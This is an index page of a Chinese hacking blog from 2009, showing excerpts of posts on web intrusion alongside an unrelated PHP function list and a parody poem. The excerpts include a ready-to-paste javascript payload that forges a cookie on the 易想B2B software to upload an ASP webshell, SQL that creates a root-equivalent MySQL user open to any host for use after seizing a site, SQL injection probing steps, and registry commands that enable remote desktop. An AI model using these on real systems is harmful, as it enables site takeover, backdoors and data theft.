黑面小窝

欢迎光临小窝，有任何问题请留言反馈。QQ:3768110 本站使用全屏模板，导致你访问框架变形的敬请谅解~

天天供求信息网站管理系统4.20day

转载：んㄗ葑訫鎖愛'S Blog

一，getpwd2.asp
<%response.buffer="True"
dim rs,sql,user,username
dim problem,id
username=request.form("username")
problem=request.form("problem")
dim connuser,password

More...

2009年11月9日

PHP语法速查表

php 函式索引 967 个函式
共有 967 个函式
Abs: 取得绝对值。
Acos: 取得反余弦值。
ada_afetch: 取得资料库的传回列。
ada_autocommit: 开关自动更动功能。
ada_close: 关闭 Adabas D 连结。
ada_commit: 更动 Adabas D 资料库。
ada_connect: 连结至 Adabas D 资料库。

More...

Tags: php

2009年11月9日

建立mysql可远程连接root权限用户

以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。

CREATE USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION

More...

Tags: mysql

2009年11月9日

易想商务程序漏洞

打开易想B2B主页，然后地址栏粘贴以下代码，然后回车，然后上传JPG后缀WEBSHELL。然后根目录/vipcom/xxxx.asp/xxx.jpg

javascript:alert(document.cookie="Yxmemberid="+escape("1"));javascipt:document.write("<a%20href=inc/uploadx.asp?tMode=6&istwo=1&utype=guser&guser=5.asp>%20点我</a>");

...

2009年11月8日

PHP注入教程

判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点.

判断字段大小:接下来,对付php猜字段的方法,我们用order by.语法如下:

http://127.0.0.1/1.php?id=1 order by 40 //如果返回正常,说明实际的字段要比40大.那么我们继续加.一直加到返回错误.

More...

2009年11月8日

出师表《80后传》

夫80后者，

　　初从文，

　　未及义务教育之免费，

　　不见高等学校之分配，

　　适值扩招，

　　过五关，

　　斩六将，

　　硕博相继，

　　寒窗数载，

　　二十四乃成，

More...

2009年11月8日

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).

1.SQL injection (classic or error based or whatever you call it)

More...

Tags: mysql 注入

2009年11月4日

当MYSQL提权连接找不到数据库时

当找到MYSQL的账户与密码的时候，丢个MYSQL提权马子发现连接成功却找不到数据库.

...

More...

Tags: mysql 提权

2009年11月4日

终端操作笔记

1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

More...

Tags:

分页:« 首页...«[67][68][69][70]71[72][73][74][75][76]»...尾页 »

日历

<< 2010-9 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

欢迎光临小窝，有任何问题请留言反馈。QQ:3768110 本站使用全屏模板，导致你访问框架变形的敬请谅解~

导航

2009年11月10日

Tags: 漏洞

发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn74=74,"

2009年11月9日

Tags: php

发布:admin | 分类:脚本语法 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn73=73,"

2009年11月9日

Tags: mysql

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn72=72,"

2009年11月9日

Tags: 漏洞

发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn71=71,"

2009年11月8日

Tags: php 注入

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn70=70,"

2009年11月8日

Tags:

发布:admin | 分类:胡说乱写 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn69=69,"

2009年11月8日

Tags: 注入

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn68=68,"

2009年11月8日

Tags: mysql 注入

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn66=66,"

2009年11月4日

Tags: mysql 提权

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn63=63,"

2009年11月4日

Tags:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: strBatchView+="spn62=62,"

日历

网站分类

文章归档

Tags

Powered By Apple Party

Copyright Black face WebSite. Some Rights Reserved.

发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:脚本语法 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:胡说乱写 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:

发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览: